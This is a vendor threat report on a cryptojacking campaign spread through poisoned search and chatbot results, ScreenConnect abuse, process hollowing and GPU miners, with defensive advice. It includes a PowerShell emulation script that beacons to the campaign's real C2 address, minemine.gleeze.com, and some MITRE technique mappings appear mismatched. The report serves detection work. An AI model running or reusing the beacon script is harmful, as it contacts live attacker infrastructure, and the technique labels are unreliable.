From Poisoned Search Results to GPU Mining: A Cryptojacking Campaign Using ScreenConnect and .NET Utilities

SOC Prime Team

From Poisoned Search Results to GPU Mining: A Cryptojacking Campaign Using ScreenConnect and .NET Utilities

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

This campaign uses SEO poisoning and manipulated AI chatbot search results to lure users into downloading fake hardware-monitoring tools. The trojanized installers carry a malicious DLL that sideloads into a legitimate application and quietly deploys ScreenConnect. Attackers then use ScreenConnect to launch a custom RunPE dropper that hollows out Microsoft-signed .NET binaries and injects the next-stage payload. The final stage downloads GPU mining tools such as gminer, lolMiner, and SRBMiner-MULTI, then maintains persistence through scheduled tasks, registry Run keys, and a startup shortcut. The malware also adds Windows Defender exclusions to reduce the chance of detection.

Investigation

Microsoft Defender researchers mapped the full infection chain, including the DLL sideloading method, abuse of ScreenConnect as a remote management tool, and use of a custom RunPE loader named SimpleRunPE.exe. Analysts recovered the ScreenConnect command-line arguments, identified the list of signed .NET binaries used for process hollowing, and documented a command-and-control endpoint protected with a pinned TLS certificate. The investigation also uncovered supporting infrastructure such as malicious domains, IP addresses, and DNS provider details linked to the campaign.

Mitigation

Defenders should enable cloud-delivered protection, enforce attack surface reduction rules, block executable files that do not meet reputation, prevalence, or age requirements, and turn on web and network protection in Microsoft Defender for Endpoint. Remote management tools such as ScreenConnect should be disabled where unnecessary or tightly controlled where required, with monitoring for unauthorized scheduled tasks and suspicious registry Run entries. Any Windows Defender exclusions added by the malware should be removed immediately, and the identified malicious domains and IP addresses should be blocked.

Response

If RuntimeHost.exe or SimpleRunPE.exe is found running from hidden cache directories, isolate the affected host at once, terminate the related ScreenConnect session, and remove all persistence mechanisms, including scheduled tasks, Run keys, and startup shortcuts. Block the domain minemine.gleeze.com and the observed IP addresses, then hunt across the environment for the listed miner binaries and autorun.dll. Finally, restore Defender protections and review exclusion settings for any unauthorized changes.

"graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffdd99 classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ffcc66 classDef persistence fill:#99ff99 classDef defense fill:#ff66cc classDef privilege fill:#ffb366 classDef c2 fill:#66ccff classDef discovery fill:#c2c2f0 %% Nodes action_initial_access["Action – T1659 Content Injection SEO poisoning and AIu2011chatbot links deliver malicious ZIP files masquerading as utilities."] class action_initial_access action technique_event_trigger["Technique – T1546.009 AppCert DLL autorun.dll placed beside legitimate utility is loaded when the utility runs."] class technique_event_trigger technique process_msiexec["Process – msiexec.exe"] class process_msiexec process technique_dll_injection["Technique – T1055.001 Dynamicu2011link Library Injection autorun.dll invokes msiexec to silently install malicious vcredist_x64.dll containing ScreenConnect installer."] class technique_dll_injection technique technique_proxy_execution["Technique – T1218.007 Msiexec Proxy Execution msiexec runs the malicious installer and establishes a ScreenConnect client."] class technique_proxy_execution technique malware_screenconnect["Malware – ScreenConnect client"] class malware_screenconnect malware persistence_scheduled["Persistence – T1543 Scheduled Tasks Tasks named u201cWindows System Healthu201d etc. relaunch the malware."] class persistence_scheduled persistence persistence_registry["Persistence – T1037.001 Logon Script Registry Run keys (HKLM/HKCU\Run\WinSysCache) added."] class persistence_registry persistence persistence_startup["Persistence – T1037.004 RC Script Shortcut in Startup folder points to RuntimeHost.exe."] class persistence_startup persistence defense_exclusions["Defense Evasion – T1564.012 File/Path Exclusions & T1564.010 Process Argument Spoofing Adds Windows Defender exclusions for files and processes."] class defense_exclusions defense defense_impair["Defense Evasion – T1562 Impair Defenses Uses the exclusions to bypass AV detection."] class defense_impair defense defense_sandbox["Defense Evasion – T1497 Virtualization/Sandbox Evasion User activity checks (T1497.002) and time based evasion (T1497.003) abort execution in analysis environments."] class defense_sandbox defense defense_codesign["Defense Evasion – T1553.002 Subvert Trust Controls Malicious code runs inside Microsoftu2011signed .NET binaries via process hollowing."] class defense_codesign defense privilege_hollowing["Privilege Escalation – T1055.012 Process Hollowing SimpleRunPE launches a legitimate .NET binary in suspended state and injects the payload."] class privilege_hollowing privilege c2_websocket["Command and Control – T1102.002 Websocket Encrypted wss://minemine.gleeze.com:8443/ws with TLS pinning."] class c2_websocket c2 discovery_info["Discovery – T1082 System Info, T1592.001 Hardware, T1592.002 Software Collects CPU, GPU, RAM, OS version, security product, etc., to assess mining viability."] class discovery_info discovery %% Flow connections action_initial_access –>|leads to| technique_event_trigger technique_event_trigger –>|loads| process_msiexec process_msiexec –>|executes| technique_dll_injection technique_dll_injection –>|installs| technique_proxy_execution technique_proxy_execution –>|installs| malware_screenconnect malware_screenconnect –>|creates| persistence_scheduled malware_screenconnect –>|creates| persistence_registry malware_screenconnect –>|creates| persistence_startup malware_screenconnect –>|adds| defense_exclusions defense_exclusions –>|enables| defense_impair defense_impair –>|facilitates| defense_sandbox defense_sandbox –>|supported by| defense_codesign defense_codesign –>|enables| privilege_hollowing privilege_hollowing –>|establishes| c2_websocket c2_websocket –>|receives| discovery_info "

Attack Flow

Attack Narrative & Commands:
An attacker has already delivered a hollowed legitimate binary onto the victim machine. The binary now initiates a persistent C2 channel over a WebSocket connection to wss://minemine.gleeze.com:8443/ws. To emulate this, we use a PowerShell script that creates a .NET ClientWebSocket, optionally sets a custom TLS certificate validation callback (simulating certificate pinning), and maintains the connection for a brief period.

Regression Test Script:

# Simulate C2 communication from a hollowed binary
# Requirements: PowerShell 5+ (built‑in .NET classes)
$c2Url = 'wss://minemine.gleeze.com:8443/ws'

# Create WebSocket client
$ws = [System.Net.WebSockets.ClientWebSocket]::new()

# OPTIONAL: Enforce certificate pinning (accept only a specific thumbprint)
$allowedThumbprint = 'ABCD1234EF567890ABCD1234EF567890ABCD1234'  # placeholder
$handler = [System.Net.Http.HttpClientHandler]::new()
$handler.ServerCertificateCustomValidationCallback = {
    param($sender, $cert, $chain, $sslPolicyErrors)
    $cert.Thumbprint -eq $allowedThumbprint
}

try {
    Write-Host "Connecting to C2 endpoint $c2Url ..."
    $ws.ConnectAsync([System.Uri]::new($c2Url), [System.Threading.CancellationToken]::None).Wait()
    Write-Host "Connection established. Sending beacon payload..."

    # Send a dummy beacon (JSON)
    $payload = '{ "beat": "alive", "ts": "' + (Get-Date).ToString('o') + '" }'
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $segment = [System.ArraySegment[byte]]::new($bytes)
    $ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()

    Start-Sleep -Seconds 10   # Keep the channel open for a short window
}
finally {
    Write-Host "Closing WebSocket..."
    $ws.Abort()
}

Cleanup Commands:

# Ensure any lingering WebSocket processes are terminated
Get-Process -Name powershell | Where-Object { $_.MainWindowTitle -match 'WebSocket' } | Stop-Process -Force
# Optionally remove temporary files used in the test
Remove-Item -Path "$env:TEMP*C2Simulation*" -Force -ErrorAction SilentlyContinue

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free